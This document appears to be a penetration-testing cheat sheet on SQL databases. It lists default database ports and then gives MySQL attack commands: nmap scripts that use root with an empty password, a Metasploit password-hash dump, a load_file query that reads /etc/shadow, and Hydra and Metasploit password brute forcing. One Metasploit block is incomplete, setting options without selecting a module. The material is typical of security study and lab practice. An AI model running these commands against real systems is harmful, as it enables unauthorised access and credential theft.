SQL

Structured Query Language (SQL) is a standardized programming language that is used to manage relational databases and perform various operations on the data in them.

Relational databases default ports

Database	Port(s)	Doc
MaxDB	7210	Doc
MySQL	3306	Doc
Oracle DB	1521, 1830	Doc
PostgreSQL	5432	Doc
SQL Server (MSSQL)	1433, 1434	Doc

NoSQL databases and other data stores default ports

Database	Port(s)	Doc
Cassandra	7000, 7001, 9042	Doc
CouchDB	5984	Doc
Elasticsearch	9200, 9300	Doc
MongoDB	27017, 27018, 27019, 28017	Doc
Neo4J	7473, 7474	Doc
Redis	6379	Doc

Enum

# Default scan
nmap $IP -sV -p 3306 

# Empty password script
nmap $IP -sV -p 3306 --script=mysql-empty-password

# Get Mysql info
nmap $IP -sV -p 3306 --script=mysql-info

# Get mysql users
nmap $IP -sV -p 3306 --script=mysql-users --script-args="mysqluser='root',mysqlpass=''"

# Get mysql databases
nmap $IP -sV -p 3306 --script=mysql-databases --script-args="mysqluser='root',mysqlpass=''"

# Get mysql variables
nmap $IP -sV -p 3306 --script=mysql-variables --script-args="mysqluser='root',mysqlpass=''"

# mysql audit
nmap $IP -sV -p 3306 --script=mysql-audit --script-args="mysql-audit.username='root',mysql-audit.password='',mysql-audit.filename='/usr/share/nmap/nselib/data/mysql-cis.audit'"

# Try to connect directly without a password
mysql -h $IP -u root

# Run query
nmap $IP -sV -p 3306 --script=mysql-query --script-args="query='select count(*) from books.authors;',mysqluser='root',mysqlpass=''"

# Metasploit way
msfconsole
set dir_list /usr/share/metasploit-framework/data/wordlists/directory.txt
setg rhosts $IP
set verbose false
run

## Hashdump
msfconsole
use auxiliary/scanner/mysql/mysql_hashdump 
setg rhosts $IP
set username root
set password ""
run

Manipulate local files via db

# connect to instance
mysql -h $IP -u root

# read local file
select load_file("/etc/shadow");

Bruteforce

# Metasploit way
msfconsole
use auxiliary/scanner/mysql/mysql_login
setg rhosts $IP
set verbose false
set stop_on_success true
set pass_file /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
set username root
run

# Hydra
hydra -l root -P  /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt $IP mysql